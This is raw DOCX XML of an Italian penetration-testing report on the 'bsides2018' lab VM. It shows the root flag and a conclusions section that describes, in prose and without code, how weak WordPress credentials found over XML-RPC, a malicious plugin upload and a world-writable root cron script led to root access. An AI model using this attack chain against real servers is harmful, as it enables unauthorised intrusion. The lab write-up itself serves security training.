            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Completata</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140">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4</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41">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Post-exploitation ed enumerazione del sistema</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42">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Completata</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43">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5</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44">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Privilege escalation (root)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45">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Completata</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="edf2fa" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="120.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="120.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000146">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">6</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47">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Acquisizione della flag finale</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="edf2fa" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="120.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="120.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000148">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Completata</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000149">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Evidenza del completamento (flag)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014B">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Il completamento dell'attività con successo, fino all'ottenimento dei privilegi di root, è stato formalmente validato dal contenuto del file /root/flag.txt, riportato integralmente di seguito:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3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shd w:fill="1e1e1e" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="120.0" w:type="dxa"/>
              <w:left w:w="160.0" w:type="dxa"/>
              <w:bottom w:w="120.0" w:type="dxa"/>
              <w:right w:w="160.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014C">
            <w:pPr>
              <w:spacing w:after="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Congratulations!</w:t>
            </w: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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">If you can read this, that means you were able to obtain root permissions on this VM.</w:t>
            </w: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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">You should be proud!</w:t>
            </w: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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">There are multiple ways to gain access remotely, as well as for privilege escalation.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000152">
            <w:pPr>
              <w:spacing w:after="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Did you find them all?</w:t>
            </w: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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">@abatchy17</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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Conclusioni e Raccomandazioni</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000157">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 Riepilogo dell'attività</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000158">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'attività di penetration testing condotta sul sistema "bsides2018" ha raggiunto pienamente gli obiettivi prefissati. Partendo da un approccio black-box, privo di informazioni pregresse sul target, è stato possibile: identificare i servizi di rete esposti e le relative versioni software (Fase 1); enumerare in profondità l'applicazione web WordPress ospitata sul server, individuando un percorso nascosto, utenti validi e credenziali deboli tramite attacco a dizionario sull'endpoint XML-RPC (Fase 2); ottenere un accesso iniziale al sistema con i privilegi dell'utente www-data mediante il caricamento di un plugin WordPress malevolo (Fase 3); enumerare il sistema individuando un cron job critico eseguito periodicamente con privilegi di root (Fase 4); sfruttare tale cron job per elevare i privilegi fino a root (Fase 5); infine, confermare il pieno controllo del sistema tramite l'acquisizione della flag finale (Fase 6).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000159">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Il tempo complessivo impiegato per il raggiungimento dell'obiettivo massimo (accesso root) è stato contenuto, a testimonianza della presenza di più debolezze concatenate e facilmente sfruttabili, nessuna delle quali avrebbe richiesto, singolarmente, competenze avanzate o strumenti sofisticati.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 Vulnerabilità critiche identificate</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Credenziali amministrative WordPress deboli — l'utente john, dotato di privilegi di Administrator sul CMS, utilizzava la password "enigma", presente in dizionari di password comuni e individuata in pochi minuti tramite attacco a dizionario sull'endpoint XML-RPC.</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Possibilità di upload di plugin non sicuro — l'interfaccia di amministrazione WordPress consente, per impostazione predefinita, agli utenti con ruolo Administrator di caricare pacchetti plugin arbitrari, di fatto equivalendo a un'esecuzione di codice remoto (RCE) non appena un account con tale ruolo viene compromesso.</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Cron job non protetto — lo script /usr/local/bin/cleanup, eseguito ogni minuto con privilegi di root, presentava permessi che ne consentivano la modifica da parte di un'utenza non privilegiata (www-data), permettendo un'immediata escalation dei privilegi.</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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scarsa separazione dei privilegi e superficie di attacco eccessiva — la coesistenza di più servizi con configurazioni permissive (FTP anonimo, SSH, CMS obsoleto) e l'assenza di segmentazione tra componenti applicativi e di sistema hanno amplificato l'impatto delle singole vulnerabilità.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015F">
      <w:pPr>
        <w:spacing w:after="400" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000160">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="bfbfbf" w:space="0" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:spacing w:before="300" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fine documento.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId22" w:type="default"/>
      <w:footerReference r:id="rId23" w:type="default"/>
      <w:pgSz w:h="16838" w:w="11906" w:orient="portrait"/>
      <w:pgMar w:bottom="1418"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pBdr>
        <w:top w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
      </w:pBdr>
      <w:jc w:val="center"/>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="595959"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Pagina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color w:val="595959"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">   |   Documento riservato — Uso interno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bottom w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
      </w:pBdr>
      <w:jc w:val="right"/>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:i w:val="1"/>
        <w:iCs w:val="1"/>
        <w:color w:val="595959"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Relazione Tecnica di Penetration Testing — Target bsides2018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124"/>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8" w:val="single"/>
        <w:right w:space="0" w:sz="0" w:val="nil"/>
        <w:between w:space="0" w:sz="0" w:val="nil"/>
      </w:pBdr>
      <w:shd w:fill="auto" w:val="clear"/>
      <w:spacing w:after="200" w:before="24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Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>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202124"/>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0212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6.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId21"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oDNSzDhZumQQnZ9NsfN1ri7SJA==">CgMxLjA4AHIhMXlaS3Y4OUR1aTdITjVhajVmOTFlMDNZaFNOY0VZSkRw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